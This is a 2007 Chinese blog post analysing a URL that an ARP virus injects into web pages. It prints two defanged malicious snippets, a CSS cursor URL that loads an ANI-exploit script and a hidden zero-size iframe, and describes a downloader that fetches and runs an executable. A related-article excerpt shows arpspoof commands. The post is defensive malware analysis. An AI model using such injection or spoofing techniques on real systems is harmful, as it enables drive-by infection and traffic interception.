ARP病毒加的网址传播Trojan-Downloader.Win32.Delf.bjy

最新推荐文章于 2021-03-18 22:09:32 发布
最新推荐文章于 2021-03-18 22:09:32 发布
阅读量1.7k 收藏
点赞数
分类专栏: 系统安全 文章标签: vbscript javascript iframe url c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1616446
版权

endurer 原创
2007-05-19 第1

分析了一下

ARP病毒“吃里巴外”?
http://endurer.bokee.com/6277614.html
http://blog.csdn.net/Purpleendurer/archive/2007/05/16/1611620.aspx
http://blog.sina.com.cn/u/49926d91010008q6

中自动添加的网址 hxxp://www.z*px**5**2*0.com/0***.htm

其中包含两处恶意代码。

其1是:
/---
<BODY style='CURSOR: url(hxxp://q***.z*px**5**2*0.com/w***.js
)'>
---/

w***.js 利用 ANI 漏洞下载 0.exe。


文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-16 10:51:40
修改时间 : 2007-5-16 10:51:40
访问时间 : 2007-5-16 10:51:57
大小 : 16652 字节 16.268 KB
MD5 : 07c7128add5aed0197d66a15a59960d7

Kaspersky 报为 Trojan-Downloader.Win32.Delf.bjy

其2是:
/---
<iframe src="hxxp://www.z*px**5**2*0.com/1***.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://www.z*px**5**2*0.com/1***.htm 的内容是 JavaScript 和 VBScript代码,利用Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载 0.exe,保存为msinfo.exe,创建 msinfo.vbs,并利用Shell.Application 对象 ZhOnG 的 ShellExecute 方法 来运行。

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
.net Core SignalR demo
11-01
这个demo 主要是利用SignalR 在.net Core 环境下的运行示例,供学习使用
2020-04-02
luoshangbangbang的博客
04-02 1308
怎么快速学习MATLAB? 看视频吧 写代码就是模仿着来慢慢跟上 https://www.iqiyi.com/v_19rwnt1bgk.html 欢迎关注 也可以另外的链接 https://www.youtube.com/watch?v=-G15ciW6HPI https://www.bilibili.com/video/av752513327/ ...
SaltStack常用的模块
EucalyptusA的博客
08-19 9120
SaltStack常用的模块 1. SaltStack模块介绍 Module是日常使用SaltStack接触最多的一个组件,其用于管理对象操作,这也是SaltStack通过Push的方式进行管理的入口,比如我们日常简单的执行命令、查看包安装情况、查看服务运行情况等工作都是通过SaltStack Module来实现的。 当安装好Master和Minion包后,系统上会安装很多Module,大家可以通过以下命令查看支持的所有Module列表 //查看所有module列表 [root@master ~]# sal
各种免费在线工具收集
weixin_30239339的博客
03-12 1231
1。站点缩略图在线制作http://bluga.net/webthumb/2。站点80X15图标及其他图标在线制作站点一http://www.nhacks.com/email/   支持多种域名的Email图标的生成。  ● 只苌柚?@"之前的文本,支持的Mail类型的包括GMail、Hotmail、Yahoo、MSN、AOL、ATT、Bigfoot、 RocketMail、QQ、Comcast...
二、Linux 教程-基础命令(1~180未完)
花开如雨的博客
10-24 6312
二、Linux 命令 1. Linux 命令大全 Linux 命令大全 Linux 命令大全 1、文件管理 cat chattr chgrp chmod chown cksum cmp diff diffstat file find git gitview indent cut ln less locate lsattr mattrib mc mdel mdir
trojan-1.16.0-win.zip
04-01
trojan
Trojan-Downloader.Win32.Generic.a...
06-08
病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
Trojan-Qt5-Windows.zip
03-14
V0.0.4c The Emergency Bug Fix for V0.0.4b V0.0.4b的紧急Bug修复 @TheWanderingCoel TheWanderingCoel released this 3 hours ago This is a version only contain these bug fixes: [Bug Fix] Fix Safari ...
Trojan-Qt5-Windows.1.1.6.rar
01-27
【标题】"Trojan-Qt5-Windows.1.1.6.rar" 是一个与恶意软件相关的压缩包文件,特别提到了"Trojan Client",这通常指的是特洛伊木马病毒的一个客户端版本。特洛伊木马是一种设计用于欺骗用户的计算机程序,表面上看...
Linux文档编辑命令大全
布偶酱的博客
07-06 7505
1.col命令Linux col命令用于过滤控制字符。在许多UNIX说明文件里,都有RLF控制字符。当我们运用shell特殊字符">"和">>",把说明文件的内容输出成纯文本文件时,控制字符会变成乱码,col指令则能有效滤除这些控制字符。语法col [-bfx][-l<缓冲区列数>] 参数:-b 过滤掉所有的控制字符,包括RLF和HRLF。-f 滤除RLF字符...
目标检测最全综述
07-24 6712
前言 图片分类任务我们已经熟悉了,就是算法对其中的对象进行分类。而今天我们要了解构建神经网络的另一个问题,即目标检测问题。这意味着,我们不仅要用算法判断图片中是不是一辆汽车, 还要在图片中标记出它的位置, 用边框或红色方框把汽车圈起来, 这就是目标检测问题。 其中“定位”的意思是判断汽车在图片中的具体位置。 近几年来,目标检测算法取得了很大的突破。比较流行的算法可以分为两类, 一类是基于Region Proposal的R-CNN系算法(R-CNN,Fast R-CNN, Faster R-CNN等),它
Webservice WCF WebApi 前端数据可视化 前端数据可视化 C# asp.net PhoneGap html5 C# Where 网站分布式开发简介 EntityFrame...
05-27 1370
Webservice WCF WebApi 注明:改编组合 在.net平台下,有大量的技术让你创建一个HTTP服务,像Web Service,WCF,现在又出了Web API。在.net平台下,你有很多的选择来构建一个HTTP Services。我分享一下我对Web Service、WCF以及Web API的看法。   Web Service   1、它是基...
R可视化19|ggplot2绘制常用30+个靓图(附R code)
qq_21478261的博客
11-11 1284
本文分享R语言绘制常用30+个靓图。
Python初学汇总杂记
king52113141314的博客
09-02 1331
1,Anaconda详细安装及使用教程(带图文) https://blog.csdn.net/ITLearnHall/article/details/81708148 2,Python为什么要使用虚拟环境-Python虚拟环境的安装和配置 https://blog.csdn.net/godot06/article/details/81079064 3,Python 3 教程 https://www.runoob.com/python3/python3-tutorial.html 4,python
Linux 维护常用命令
王大帅的编程博客
07-29 1642
1、查看某文件的一部分如果你只想看文件的前 5 行,可以使用 head 命令, 如:head -5 /etc/passwd 如果你想查看文件的后 10 行,可以使用 tail 命令, 如:tail -10 /etc/passwd 查看文件中间一段,可以使用 sed 命令 如:sed –n 5,10p /etc/passwd 这样你就可以只查看文件的第 5 行到第
一些linux应用小技巧,网络相关,系统管理,shell,程序使用
Herr Apfel的专栏
07-18 1203
 转自LinuxFans:http://www.linuxfans.org/nuke/modules.php?name=Forums&file=viewtopic&t=97710网络相关:1、关于arp协议:关于arp命令,注意其中的Flags,如果是C,表示是动态的,但是如果使用arp -s 来绑定的话则是显示M,是静态所以后边每个侦都需要入填充字符以达到以太网的最小长
关于arp攻击,网页跳转到另外一个网页的解决方案
弧度制
07-01 970
arp攻击,网页跳转到另外一个网页的解决方案
局域网arp攻击,获取对方浏览网页
weixin_46236101的博客
03-18 754
环境配置 攻击机kali 192.168.1.128 桥接模式,桥接的主机的网卡 靶机windows10 192.168.1.103 复现 用到的命令 arpspoof -i eth0 -t 192.168.1.103 192.168.1.1 网卡 靶机 网关 echo 0 > /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/ip_forw..
Trojan-Downloader.Win32.Agent.bbb 木马手动查杀
最新发布
06-09
首先,关闭所有正在运行的程序,然后按照以下步骤手动查杀Trojan-Downloader.Win32.Agent.bbb木马: 1. 打开任务管理器,结束所有Trojan-Downloader.Win32.Agent.bbb木马相关进程。 2. 删除Trojan-Downloader.Win...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值